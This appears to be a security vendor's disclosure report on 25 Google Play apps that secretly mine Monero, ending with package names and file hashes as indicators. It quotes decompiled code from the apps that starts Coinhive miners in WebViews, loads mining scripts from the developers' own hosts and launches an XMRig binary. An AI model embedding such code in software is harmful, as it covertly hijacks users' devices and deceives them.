By Pankaj Kohli
Even though the prices of cryptocurrencies have tanked considerably in the past few months, malware authors are still upbeat about the idea of leveraging victims’ devices for mining. In conjunction with our contribution to the Cyber Threat Alliance report on cryptomining and cryptojacking, released last week, we’re publishing this report on undisclosed cryptomining code in mobile apps.
SophosLabs recently discovered 25 apps on Google Play that disguise themselves as games, utilities and educational apps, but under the hood they turn victim’s mobile device into cryptocurrency churning rigs. These apps had been downloaded and installed more than 120,000 times.
Most of the apps were found to have embedded code from Coinhive, a JavaScript implementation to mine Monero. Coinhive is specifically written to crunch numbers using CPUs (as opposed to graphics processors), which makes it a perfect candidate for covert mining on mobile devices.
The miner code, which is only a few lines long, can be easily added into any app that uses a WebView embedded browser. Monero has been the authors’ choice of cryptocurrency for all these apps as it offers sufficient privacy to keep the source, destination, and the amount mined hidden. These apps use CPU throttling to limit CPU usage by mining, and thus avoid the usual pitfalls: Device overheating, high battery drain, and overall device sluggishness – a mistake made by the mobile mining malware Loapi last year.
11 of these 25 apps were preparation apps for standardized tests given in the US, exams such as the ACT, GRE, or SAT, and were published by a single developer account (Gadgetium). These apps contain a HTML page which contains Coinhive-based miner.
function startMiner(n, id) { if(isAlreadyStarted) return; isAlreadyStarted=true; var miner = new CoinHive.Anonymous(id, { threads: n-1, autoThreads: true, throttle: 0.5 }); miner.start(); }
The apps first enable JavaScript and load the HTML page using a WebView.
this.mWebView.getSettings().setJavaScriptEnabled(true); ... this.mWebView.loadUrl("file:///android_asset/test.html");
The miner is then started using a wallet value (miner_id
) retrieved from the resources.
this.mWebView.loadUrl("javascript:startMiner(\"" + this.mNumCores + "\",\"" + this.getString(string.miner_id) + "\")");
While most of the Coinhive based mining apps relied on scripts hosted on coinhive.com
, two of these apps – co.lighton
and com.mobeleader.spsapp
hosted the mining scripts on their own servers (shown below), presumably to thwart firewalls or parental controls/reputation services that might block Coinhive’s domain by default.
Log.i(this.this$1.this$0.TAG, " STOP "); this.this$1.this$0.web.loadUrl("about:blank"); this.this$1.this$0.cancelNotification(); this.this$1.this$0.mFirebaseAnalytics.logEvent("miner_stop", ((Bundle)v8)); } else { Log.i(this.this$1.this$0.TAG, " START "); this.this$1.this$0.web.loadUrl("http://www.buyguard.co/sdk/?key=1a0Cej64dYffEiItrLIeiq4GfpPtn0Hf"); this.this$1.this$0.setNotification(); this.this$1.this$0.mFirebaseAnalytics.logEvent("miner_start", ((Bundle)v8)); }
this.c = new WebView(this.getApplicationContext()); this.c.getSettings().setJavaScriptEnabled(true); this.c.setWebChromeClient(new WebChromeClient()); this.c.loadUrl("https://miner.mobeleader.com/miner.php?hash=" + this.a.getString("mobeleader_appHash", "") + "&coin=" + this.a.getString("mobeleader_coin", ""));
One of the discovered apps – de.uwepost.apaintboxforkids
was found to using XMRig, an open-source CPU miner that can mine several cryptocurrencies, including Monero.
ProcessBuilder v8 = new ProcessBuilder(new String[]{"./xmrig"}); v8.directory(this.getApplicationContext().getFilesDir()); v8.environment().put("LD_LIBRARY_PATH", this.privatePath); v8.redirectErrorStream(); this.accepted = 0; this.process = v8.start(); this.outputHandler = new OutputReaderThread(this, this.process.getInputStream()); this.outputHandler.start(); Log.i("MiningSvc", "started, threads=" + arg10.threads + ", maxCpu=" + arg10.maxCpu);
Although mining apps have been categorically banned on Google Play, many such miners still continue to be freely available on the marketplace.
SophosLabs notified Google about these mining apps in August. Although some of these apps have been taken down, many of these continue to remain available. These apps are detected by Sophos Mobile Security as Coinhive JavaScript cryptocoin miner and Android XMRig Miner.
Indicators of Cryptomining
Package Name | SHA1 |
com.cakrawalapengetahuan.infogurupendidikan | 28335b0feeef216cad3e578c62ed78450fefbf19 |
com.devmouakkit.mugginsdominoesgame | 0f65dac3cc40e888c52f38dc0121990a47cdf773 |
com.gadgetium.android.act | d758e3e00a002d882ed9993ba9dc1efb4e7746df |
com.gadgetium.android.cat | dc92d18740ae5f802a96e5da72e655f12627c927 |
com.gadgetium.android.sat | 00739b32e5edb863e6f029aa171025a7161e5fc6 |
com.gadgetium.gmat | 533ece694ec86d834ddcbd918aa6497741f1ef9b |
com.gadgetium.gre | af0348a4c975aaa1e0bf0bbc95f9f258f1653250 |
com.gadgetium.lsat | 09807f9f2059da076b681501ba472c625bcb974d |
com.gadgetium.psat | 0589115a44f8dd52c9c21b92fa2b5b933663601c |
com.gadgetium.test.aieee | 137098f142b685caf878ae9e034797cee0dc17f9 |
com.gadgetium.test.aiims | 73839664372812a004d65a6592c985fb26bbd7a5 |
com.gadgetium.test.gate | 208f843528e51bc8ca1896042da3fa4a2d9dd847 |
com.gadgetium.test.stan | 0059e145a12a99a63a364c27ead7ed04d7d2dd16 |
com.lhds.vendors.android | 7e80cb4ae5adf85ccca8e251263e1ab44ea51611 |
com.palpostr.palkar | b85b257e1ffd0c48811a53f3b9577669f917af6f |
com.rdt.tapbugs | de45eee90c954befdd7451c6d611f53ee729af6e |
com.rdt.yamaya.dreamspell | 299805c00b7fe80667042de671335362ebe2b62f |
com.rlite.funnfair | d5482461e0c70dd7e2988819a47f8161a5c4d8ad |
com.servicehangar.seriestrailer | c31720e56233f455b3527c5ddc536c2b9b94516c |
com.thanhtuteam.gameviet2048 | ffc00c57f1339abe99aa4c8e561accaed2e695ea |
de.uwepost.apaintboxforkids | c943fa6b495469104d2a46a11f626d65f237a3f3 |
com.mobeleader.spsapp | 86da0dc430247a6fbbcd0fcb9b848deab37e6676 |
com.solovev.kghelper | edaf4166d4d332659af2c7c0252ea0b09800bf2f |
com.thothprojects.trancedroid | 0c87047219723f4d223d37706e26eabb2efdd839 |
co.lighton | ab0d5b5a1c8db42352cdc8173630099f8628dc5b |
asdf
Nice job google, NOT.